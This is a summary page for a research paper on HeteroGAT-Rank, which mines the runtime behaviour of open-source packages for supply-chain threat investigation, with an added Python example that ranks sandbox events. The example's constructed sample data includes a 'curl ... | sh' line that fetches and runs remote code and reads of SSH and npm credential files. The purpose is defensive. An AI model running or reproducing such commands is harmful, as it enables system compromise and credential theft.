Operational Runtime Behavior Mining for Open-Source Supply Chain Security
Zhuoran Tan, Ke Xiao, Jeremy Singer, Christos Anagnostopoulos

TL;DR
HeteroGAT-Rank is a runtime behavior mining system that models open-source software execution as heterogeneous graphs, helping security analysts identify relevant threat indicators efficiently at scale.
Contribution
The paper introduces HeteroGAT-Rank, a novel system that uses attention-based graph learning on execution behaviors to support manual security investigations in open-source supply chains.
Findings
Effectively highlights meaningful behavioral indicators.
Supports scalable analysis across multiple ecosystems.
Aligns with real-world vulnerability and attack trends.
Abstract
Open-source software (OSS) is a critical component of modern software systems, yet supply chain security remains challenging in practice due to unavailable or obfuscated source code. Consequently, security teams often rely on runtime observations collected from sandboxed executions to investigate suspicious third-party components. We present HeteroGAT-Rank, an industry-oriented runtime behavior mining system that supports analyst-in-the-loop supply chain threat investigation. The system models execution-time behaviors of OSS packages as lightweight heterogeneous graphs and applies attention-based graph learning to rank behavioral patterns that are most relevant for security analysis. Rather than aiming for fully automated detection, HeteroGAT-Rank surfaces actionable runtime signals - such as file, network, and command activities - to guide manual investigation and threat hunting. To…
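As an added example, not code from the paper or its authors: one way to turn sandbox runtime observations into the kind of lightweight heterogeneous graph the abstract describes, with typed nodes for the package, files, hosts and commands, and typed edges for reads, writes, connects and executes, plus command-to-file and command-to-host edges recovered from the command text so that chained behaviors connect. The paper ranks patterns with attention-based graph learning; this example substitutes a transparent proxy (log-rarity of each behavior against a constructed benign baseline, weighted by the node's typed degree) so it runs offline. The package name, the event list, the baseline counts and every path and host are constructed.

```python
"""Added example: build a heterogeneous behavior graph from sandbox runtime
events and rank the behaviors for analyst triage. Not the paper's code."""
import math
from collections import defaultdict

# Constructed sandbox observations for a hypothetical package "pkg-a".
# Each entry is (event_type, detail); hosts and paths are made up.
SAMPLE_EVENTS = [
    ("file_read", "/home/user/.npmrc"),
    ("file_read", "/etc/hosts"),
    ("file_write", "/tmp/.x/run.sh"),
    ("net_connect", "203.0.113.10:443"),
    ("cmd_exec", "bash /tmp/.x/run.sh"),
    ("cmd_exec", "curl -s http://203.0.113.10/p | sh"),
    ("file_read", "/home/user/.ssh/id_rsa"),
    ("net_connect", "203.0.113.10:443"),
]

# Constructed baseline: of BASELINE_PACKAGES benign packages run in the same
# sandbox, how many exhibited each (node_type, detail). Absent means zero.
BASELINE_PACKAGES = 200
BASELINE_COUNTS = {
    ("file", "/etc/hosts"): 150,
    ("file", "/home/user/.npmrc"): 90,
    ("file", "/home/user/.ssh/id_rsa"): 1,
}

# Event type -> (target node type, edge type from the package node).
EVENT_TO_EDGE = {
    "file_read": ("file", "reads"),
    "file_write": ("file", "writes"),
    "net_connect": ("host", "connects"),
    "cmd_exec": ("command", "executes"),
}


class HeteroGraph:
    """Typed nodes and typed directed edges; repeats raise a multiplicity count."""

    def __init__(self):
        self.nodes = {}                 # (ntype, key) -> number of observations
        self.edges = defaultdict(int)   # (src, etype, dst) -> multiplicity

    def add_node(self, ntype, key):
        node = (ntype, key)
        self.nodes[node] = self.nodes.get(node, 0) + 1
        return node

    def add_edge(self, src, etype, dst):
        self.edges[(src, etype, dst)] += 1

    def degree(self, node):
        """Multiplicity-weighted degree over all edge types."""
        return sum(m for (s, _, d), m in self.edges.items() if node in (s, d))


def build_graph(package, events):
    """Package -> file/host/command edges, plus command -> file/host edges
    inferred from the command text, so behaviors that chain together connect."""
    g = HeteroGraph()
    pkg = g.add_node("package", package)
    for event_type, detail in events:
        ntype, etype = EVENT_TO_EDGE[event_type]
        g.add_edge(pkg, etype, g.add_node(ntype, detail))
    commands = [n for n in g.nodes if n[0] == "command"]
    for cmd in commands:
        for other in list(g.nodes):
            if other[0] == "file" and other[1] in cmd[1]:
                g.add_edge(cmd, "touches", other)
            elif other[0] == "host" and other[1].split(":")[0] in cmd[1]:
                g.add_edge(cmd, "contacts", other)
    return g


def rarity(node):
    """Log-rarity against the benign baseline; never-seen behaviors score highest."""
    seen = BASELINE_COUNTS.get(node, 0)
    return math.log((BASELINE_PACKAGES + 1) / (seen + 1))


def rank_behaviors(g):
    """Score = rarity * (1 + typed degree): rare behaviors that sit at the
    junction of several edge types float to the top. A proxy for the paper's
    attention-based ranking, not an implementation of it."""
    ranked = [(rarity(n) * (1 + g.degree(n)), n) for n in g.nodes if n[0] != "package"]
    ranked.sort(key=lambda item: (-item[0], item[1]))
    return ranked


if __name__ == "__main__":
    graph = build_graph("pkg-a", SAMPLE_EVENTS)
    for score, (ntype, key) in rank_behaviors(graph):
        print(f"{score:6.2f}  {ntype:8s} {key}")
```

On the constructed input the never-seen host comes out on top because it is both contacted directly and referenced by an executed command, while the two commonly read files sink to the bottom; swapping the rarity-times-degree proxy for a learned scorer is where the paper's graph attention would plug in.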
Taxonomy
Topics: Information and Cyber Security · Advanced Malware Detection Techniques · Software Engineering Research
